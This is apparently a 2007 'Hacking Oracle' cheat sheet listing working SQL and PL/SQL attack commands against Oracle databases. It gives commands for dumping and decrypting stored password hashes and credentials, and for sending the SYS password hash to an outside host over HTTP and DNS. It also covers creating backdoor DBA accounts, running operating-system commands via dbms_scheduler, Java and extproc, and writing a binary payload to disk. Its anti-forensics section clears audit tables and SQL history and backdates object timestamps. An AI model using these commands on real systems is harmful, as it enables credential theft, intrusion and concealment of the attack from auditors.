Information Retrieval:
Get Version:
select * from v$version
-- all users
Get Security Patchlevel:
select * from dba_registry;
-- only DBA, 9i+, empty or non existing table= no Security Patch
Installed Database Components:
select * from dba_registry;
-- only DBA
Get Userlist:
select * from all_users;
-- only DBA
Get User & Passwords Hashes:
select username,password,account_status from dba_users;
-- only DBA until 10g R2
Get Apex Password Hashes:
select user_name, web_password_raw from flows_030000.wwv_flow_fnd_user;
-- only DBA, 030000 = APEX version 3.0, 020100=2.1
Decrypt Apex Password Hashes:
select user_name,
utl_http.request('http://md5.rednoize.com/?q='||web_password_raw||’&b=MD5-Search’)
-- only DBA, requires internet access from the database
from flows_030000.wwv_flow_fnd_user;
Get Metalink account/password:
select sysman.decrypt(aru_username), sysman.decrypt(aru_password)
-- only DBA, 10g – 11g
Get Password of mgmt_view_user
select view_username, sysman.decrypt(view_password)
from sysman.mgmt_view_user_credentials;
-- only DBA, 10g – 11g
Get Passwords of DB/Grid Control:
select credential_set_column, sysman.decrypt(credential_value)
from sysman.mgmt_credentials2;
-- only DBA, 10g – 11g
TDE Encrypted Tables:
select table_name,column_name,encryption_alg,salt
from dba_encrypted_columns;
-- only DBA, 10g – 11g
Already DBA?
desc dba_users
-- only possible if DBA (or select any dictionary)
Get System Privileges:
select * from user_sys_privs;
-- show system privileges of the current user
Get Role Privileges:
select * from user_role_privs;
-- show role privileges of the current user
Get Table Privileges:
select * from user_tab_privs;
-- show table privileges of the current user
Get interesting tables:
select table_name, column_name, owner
from dba_tab_columns
where ((upper(column_name) -- show tables with columns containing the string 'PWD’, ...
like '%PWD%' or upper(column_name) like '%PASSW%' or
upper(column_name) like '%CREDEN%' or
upper(column_name) like '%AUTH%'))
Get a list of all Oracle directories:
select * from dba_directories;
-- show Oracle directories
Show Values of audit parameter:
show parameter audit
-- show all parameters of audit
Show Values of utl parameter:
show parameter utl
-- show all parameters of utl (e.g. *)
Access SQL History (v$sql):
select sql_text
from sys.v$sql
where lower(sql_text) like '%utl_http%';
-- search all SQL statements containing the string utl_http
Access SQL History (wrh$_sqltext):
select sql_text
from sys.wrh$_sqltext
where lower(sql_text) like '%utl_http%';
-- search all SQL statements containing the string utl_http
Web Access:
Web access via utl_http:
select utl_http.request('http://www.orasploit.com/utl_http') from dual;
-- all users,, 8-10g R2
Web access via httpuritype:
select httpuritype( 'http://www.orasploit.com/httpuritype' ).getclob() from dual;
-- all users,, 8-10g R2
Send password hash to webserver:
select utl_http.request('http://www.orasploit.com/' ||
(select username || '=' || password
from dba_users
-- only DBA, change value of username for other users
where username = 'SYS'))
from dual;
Send password hash to webserver:
select httpuritype('http://www.orasploit.com/' ||
(select username || '=' || password
from dba_users
-- only DBA, change value of username for other users
where username = 'SYS')) .getclob()
from dual;
Send password hash via DNS:
select utl_http.request('http://www.' ||
(select username || '=' || password
from dba_users
-- only DBA, change value of username for other users
where username = 'SYS') || '.orasploit.com/')
from dual;
Change Oracle Passwords:
With SQL*Plus Password cmd:
password system;
-- Password not send in cleartext
With Alter user cmd:
alter user system identified by rds2007;
-- Password send in cleartext over the network
With Alter user cmd:
alter user system identified by values '737B466C2DF536B9’;
-- Set a password hash directly
With grant:
grant connect to system identified by rds2007;
-- Password send in cleartext over the network
With update:
update sys.user$ set password = '737B466C2DF536B9' where name=’SYSTEM’;
-- Password send in cleartext over the network, DB restart necessary
Useful Tools / Links:
checkpwd: http://www.red-database-security.com/software/checkpwd.html -- fastest Oracle dictionary password cracker
orabf http://www.toolcrypt.org/tools/orabf/index.html -- fastest Oracle Brute Force cracker
Tnscmd http://www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd -- control unprotected TNS Listener without Oracle Client
sidguess: http://www.red-database-security.com/software/sidguess.zip -- fastest Oracle dictionary password cracker
Oracle Assessment Kit: http://www.databasesecurity.com/dbsec/OAK.zip -- useful tools, e.g. To exploit the alter session bug
Oracle Instant Client http://www.oracle.com/technology/software/tech/oci/instantclient/index.html -- Oracle Instant Client
Oracle SQL Developer http://www.oracle.com/technology/software/products/sql/index.html -- GUI Tool for Oracle in Java
Anti-Forensics:
Clear v$sql:
alter system flush shared pool;
-- only DBA, all versions
Clear sys.wrh_sqlstat:
truncate table sys.wrh$_sqlstat;
-- only DBA, 10g/11g
Clear audit-Table:
truncate table sys.aud$;
-- only as SYS, all versions
Clear audit-Table:
delete table sys.aud$;
-- all users, all versions
Change Object Creation Date:
update sys.obj$
set ctime = sysdate - 300, mtime = sysdate - 300, stime = sysdate - 300
where name = 'AUD$';
-- change the creation date of an object
Create Oracle User:
With create user cmd:
create user user1 identified by rds2007;
grant dba to user1;
-- Password send in cleartext over the network
With grant:
grant dba to user1 identified by rds2007;
-- Privilege granted, User will be created if not existing
With grant:
grant connect to user1,user2,user3,user4 identified by user1,user2,user3,user4;
-- Password send in cleartext over the network
Run OS Commands via dbms_scheduler: (10g/11g only)
-- Create a Program for dbms_scheduler
exec DBMS_SCHEDULER.create_program('RDS2007','EXECUTABLE','c:\WINDOWS\system32\cmd.exe /c echo 0wned >> c:\rds3.txt',0,TRUE);
-- Create, execute and delete a Job for dbms_scheduler
exec DBMS_SCHEDULER.create_job(job_name => 'RDS2007JOB',program_name => 'RDS2007',start_date => NULL,repeat_interval => NULL,end_date => NULL,enabled => TRUE,auto_drop => TRUE);
-- delete the program
exec DBMS_SCHEDULER.drop_program(PROGRAM_NAME => 'RDS2007');
-- Purge the logfile for dbms_scheduler
--exec DBMS_SCHEDULER.PURGE_LOG;
Hacking Oracle – www.red-database-security.com - Version 1.3 - 2-Sep-2007
Write Binary Files via utl_file:
Create or replace directory EXT as 'C:\’;
DECLARE fi UTL_FILE.FILE_TYPE; bu RAW(32767);
BEGIN
bu:=hextoraw('BF3B01BB8100021E8000B88200882780FB81750288D850E8060083
C402CD20C35589E5B80100508D451A50B80F00508D5D00FFD383C40689EC5DC
3558BEC8B5E088B4E048B5606B80040CD21730231C08BE55DC39048656C6C6F
2C20576F726C64210D0A');
fi:=UTL_FILE.fopen('EXT','rds2007.com','w',32767);
UTL_FILE.put_raw(fi,bu,TRUE);
UTL_FILE.fclose(fi);
END;
/
Write Text Files via dbms_advisor: (10g/11g, requires the privilege advisor)
Create or replace directory EXT as 'C:\’;
grant advisor to user1;
exec dbms_advisor.create_file ( 'hacked', EXT, 'rds2.txt' )
Write Binary Files via utl_file:
Create or replace directory EXT as 'C:\’;
DECLARE
v_file UTL_FILE.FILE_TYPE;
BEGIN
v_file := UTL_FILE.FOPEN('C:\','rds1.txt', 'w');
UTL_FILE.PUT_LINE(v_file,'first row');
UTL_FILE.NEW_LINE (v_file);
UTL_FILE.PUT_LINE(v_file,'second row');
UTL_FILE.FCLOSE(v_file);
END;
Read Files via Java:
grant javasyspriv to user1;
CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "JAVAREADFILE" AS
import java.lang.*;
import java.io.*;
public class JAVAREADFILE{
public static void readfile(String filename) throws IOException{
FileReader f = new FileReader(filename);
BufferedReader fr = new BufferedReader(f);
String text = fr.readLine();;
while(text != null){
System.out.println(text);
text = fr.readLine(); }
fr.close(); }
};
CREATE OR REPLACE PROCEDURE JAVAREADFILEPROC (p_filename IN
VARCHAR2)
AS LANGUAGE JAVA
NAME 'JAVAREADFILE.readfile (java.lang.String)';
/
set serveroutput on size 100000
exec dbms_java.set_output(2000);
exec JAVAREADFILEPROC('C:\boot.ini')
Run OS Commands via Java: (requires Java in the Database)
grant javasyspriv to user1;
create or replace and resolce java source name "JAVACMD" AS
import java.lang.*;
import java.io.*;
public class JAVACMD
{
public static void execCommand (String command) throws IOException {
Runtime.getRuntime().exec(command);} };
/
Create or replace procedure javacmdproc (p_command in varchar2)
as language java
name 'JAVACMD.execCommand (java.lang.String)';
/
exec javacmdproc('cmd.exe /c echo 0wned > c:\rds4.txt');
Run OS Commands via ALTER SYSTEM & PL/SQL native: (9i)
alter system set plsql_native_make_utility='cmd.exe /c echo 0wned > c:\rds6.txt &';
alter session set plsql_compiler_flags='NATIVE';
Create or replace procedure rds as begin null; end;
/
Run OS Commands via Extproc
-- Since 9i extproc can only run DLLs from the Oracle_Home-Bin directory
-- copy the msvcrt.dll to this directory before executing this code
Grant create any library to user1;
--Windows
Create or replace library exec_shell AS 'C:\oracle\ora102\bin\msvcrt.dll';
--Linux
create or replace library systemcalls is '/lib/libc.so';
Create or replace package oracmd is procedure exec(cmdstring IN CHAR); end oracmd; /
Create or replace package body oracmd IS
procedure exec(cmdstring IN CHAR)
is external NAME "system"
library exec_shell LANGUAGE C;
end oracmd;
/
exec oracmd.exec('cmd.exe /c echo 0wned > c:\rds7.txt');
Run OS Commands via ALTER SYSTEM & PL/SQL native: (9i)
alter system set plsql_native_make_utility='cmd.exe /c echo 0wned > c:\rds5.txt &';
alter session set plsql_compiler_flags='NATIVE';
Create or replace procedure rds as begin null; end;
/